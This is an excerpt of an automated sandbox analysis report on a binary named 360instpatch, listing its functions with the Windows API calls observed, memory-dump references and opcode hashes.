                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2839725968-0
                                                                                                                                                                                                              • Opcode ID: b5309616b383b84963536c368e7938f42449d018625aeb125d16911fac44188e
                                                                                                                                                                                                              • Instruction ID: eae0746cfb020af8f7fa6ca2f87a80c3b733dde956fa6a81312532db2a1dcb3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5309616b383b84963536c368e7938f42449d018625aeb125d16911fac44188e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF090766043019FE748CF24D415956BBE1EF84310F11C86DE4458B3B0C775C801CB51
                                                                                                                                                                                                              Function 00B28940 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00B28967
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              • Opcode ID: de387e1a9b76c503ef195473d28bb00ff9fcc72693c340c3eb485e36427e7684
                                                                                                                                                                                                              • Instruction ID: f1938aae9a3fd8bca24496e07ddaecf44e46fe93cb680cae409f6853507bc7aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de387e1a9b76c503ef195473d28bb00ff9fcc72693c340c3eb485e36427e7684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F0F47610121AEFDF058F80D805EEE7BA9EF48340F108059FD4196260DB76EA21DBA0
                                                                                                                                                                                                              Function 6BF26BE8 Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,6BF05BD5,customproxytype,?,AA5945B3), ref: 6BF26C13
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3660427363-0
                                                                                                                                                                                                              • Opcode ID: 0a0362beda225489c956a59dbbf5920019ad639075da909a7550744edcc0818d
                                                                                                                                                                                                              • Instruction ID: c65b8b31f51562b20ad1f13434c9d3933f7a8a1129720062439fe18d24a94ff4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a0362beda225489c956a59dbbf5920019ad639075da909a7550744edcc0818d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF08CB3650208FBEB08EFA0C844FEA7FA8EB05349F008458BD06C6390E774E644CB60
                                                                                                                                                                                                              Function 6BF2C72F Relevance: 1.5, APIs: 1, Instructions: 31windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF38425: _malloc.LIBCMT ref: 6BF3843F
                                                                                                                                                                                                              • PostMessageW.USER32(6BFCC3F0,000004CD,00000000,00000001), ref: 6BF2C776
                                                                                                                                                                                                                • Part of subcall function 6BF2C522: _memset.LIBCMT ref: 6BF2C530
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2839725968-0
                                                                                                                                                                                                              • Opcode ID: 5c849ee0ddad446b8b8e67e92e332d48558a2655e2a973dfe33dfaae3d48a74d
                                                                                                                                                                                                              • Instruction ID: 22cd77eebb78138c608106bbeea8c74fe06ae1e4a5e990094318d21c70a765c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c849ee0ddad446b8b8e67e92e332d48558a2655e2a973dfe33dfaae3d48a74d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97F0E27AA003019FE7588F29D805E22FBF5EF84720B15C0AEE4488B3B1D77AD841CB50
                                                                                                                                                                                                              Function 6CD3AE3F Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD3AE46
                                                                                                                                                                                                                • Part of subcall function 6CD3AD48: _memset.LIBCMT ref: 6CD3AD6C
                                                                                                                                                                                                                • Part of subcall function 6CD3AD48: PathCombineW.SHLWAPI(?,?,Config\SafeIME.xml), ref: 6CD3AD82
                                                                                                                                                                                                                • Part of subcall function 6CD3A35F: _memset.LIBCMT ref: 6CD3A39B
                                                                                                                                                                                                                • Part of subcall function 6CD3A35F: GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 6CD3A3B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$CombineFileH_prolog3ModuleNamePath
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2129597180-0
                                                                                                                                                                                                              • Opcode ID: 10643cae8f95ccbbbcfc0abb36c60f3ca7b90d24693b7f0c86e2eb2d33635819
                                                                                                                                                                                                              • Instruction ID: bcd22ea01c1057f13f80f8f6923733cb183a090fcafa2c830b311c846ae45637
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10643cae8f95ccbbbcfc0abb36c60f3ca7b90d24693b7f0c86e2eb2d33635819
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F01731B022258AEF11DB94C6047ADB2B4AB06709F50641C841DA6BF0DB78D948C766
                                                                                                                                                                                                              Function 00B86A97 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000002,?,00B48D5A,00000000,00000000,?,?,00B86931,?,0000011E,FFFFFEE2,00000002,?,00000000,00000000,00000748), ref: 00B86AC1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              • Opcode ID: 4803c07c07bcb5010e8916ec0f1cd118de5da866383105bead13d73b93b46656
                                                                                                                                                                                                              • Instruction ID: 5b171f8cc6c6706a846408e39127daaced399c86a6f56bf304e6bede33b92d13
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4803c07c07bcb5010e8916ec0f1cd118de5da866383105bead13d73b93b46656
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32E0ED31500118FB8F15EF75DA4199E7BE8EB15391F10C5A5B816E61A0E731DE10EB60
                                                                                                                                                                                                              Function 00B7A29F Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00B7FC56,?,?,?,00000000,?,?), ref: 00B7A2C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DrawGdipImageRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2615643336-0
                                                                                                                                                                                                              • Opcode ID: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                                                              • Instruction ID: 536182f144af1ef737ce838d48ffe9821299592d8228e02331af2f04f9f7badc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57e98256349b33f45eac1a576c0902249758a86366d920aef6816e6e1e3cefaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41E0483610410AAF9F518F94CD00CAB7BE9EF44350B04C465BD19C6522D732DC30FBA1
                                                                                                                                                                                                              Function 00B32982 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00B329C2
                                                                                                                                                                                                                • Part of subcall function 00B94656: RaiseException.KERNEL32(?,?,?,00B180B1,?,?,?,?,?,00B180B1,00BEF5B8,00BEF5B8), ref: 00B94698
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3976011213-0
                                                                                                                                                                                                              • Opcode ID: 6c63a7c48856e3098d9297865b40794d513a34c3b29458d4c98ce4e7bddeacdd
                                                                                                                                                                                                              • Instruction ID: 36f0fb2977bf282bebf00ddb8235b018ce8d4519fb7b9805d841a9c8a9611f2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c63a7c48856e3098d9297865b40794d513a34c3b29458d4c98ce4e7bddeacdd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0927210021AEADF20AF85C802FE5BBD8EF14364F1080BAFC9C46250E7B1A984CB90
                                                                                                                                                                                                              Function 6BF26CC7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegSetValueExW.KERNEL32(?,00000000,00000000,00000004,?,00000004,?,6BF05B99,proxytype,00000001,proxytype,?,AA5945B3), ref: 6BF26CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                              • Opcode ID: c6fd5b8f286aabad6fcdfd43eb0f33e12f6f082e37e34d1e54d8e18cb66a9fa8
                                                                                                                                                                                                              • Instruction ID: 394a99f25eab9ad862c4877675bd70cc6cddebadfaf9348ebd8d720808192c50
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6fd5b8f286aabad6fcdfd43eb0f33e12f6f082e37e34d1e54d8e18cb66a9fa8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE04873394208BADF009EA4C805F953768D715B55F10C026BB2ACA1D0D675D104CB50
                                                                                                                                                                                                              Function 00B2898E Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000), ref: 00B289A8
                                                                                                                                                                                                                • Part of subcall function 00B226C0: RegCloseKey.ADVAPI32 ref: 00B226CC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 47109696-0
                                                                                                                                                                                                              • Opcode ID: c0f0ac0a63e3a714fe6653ce0fb559e7839afe370eb5147e04cc602cfda12e70
                                                                                                                                                                                                              • Instruction ID: 05661ae292c5e4ef703517aa2b68338fefa457111db354065da2138bb7acc018
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0f0ac0a63e3a714fe6653ce0fb559e7839afe370eb5147e04cc602cfda12e70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10E04672200218FBEF159F40DC06FAEBBADEB44314F104058F801A6260EBB5AF10DBA4
                                                                                                                                                                                                              Function 6BEFAE3C Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KiUserExceptionDispatcher.NTDLL(406D1388,00000000,00000004,00001000,6BF78AA8,00000018,6BF2E73E,00000000), ref: 6BEFAE6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DispatcherExceptionUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 6842923-0
                                                                                                                                                                                                              • Opcode ID: e3db67f1177c92c8ad1086a39f6127644b98b5d36cdbf135a367f2bb06e59001
                                                                                                                                                                                                              • Instruction ID: 53733992a5dddd89248b78b748baa4e4e80af9daecd0cb631126c020b7522750
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3db67f1177c92c8ad1086a39f6127644b98b5d36cdbf135a367f2bb06e59001
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30E0E5B2940608EFDB50DFE8C815ADDBBB0EB48320F10829AE555EB290D7788A418F64
                                                                                                                                                                                                              Function 6CDE8189 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,?,6CDE43D3,00000001,?,?,?,6CDE454C,?,?,?,6CE25448,0000000C,6CDE4607), ref: 6CDE819E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                                              • Opcode ID: 4208847719243d14e3752dd0c393e999993b913ab331d2a71456929238cdcf22
                                                                                                                                                                                                              • Instruction ID: d5a312bc38ebdd5f06b67a4f0ea35686f4e27cf548fb1d921994904f048f71c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4208847719243d14e3752dd0c393e999993b913ab331d2a71456929238cdcf22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7D05E72B947449EEF005E75AD087223BFCE385799F444536B90CC6140E771C5609540
                                                                                                                                                                                                              Function 6BF4041E Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00001000,00000000,?,6BF3D8C5,00000001,?,?,?,6BF3DA3E,?,?,?,6BF7C420,0000000C,6BF3DAF9), ref: 6BF40433
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
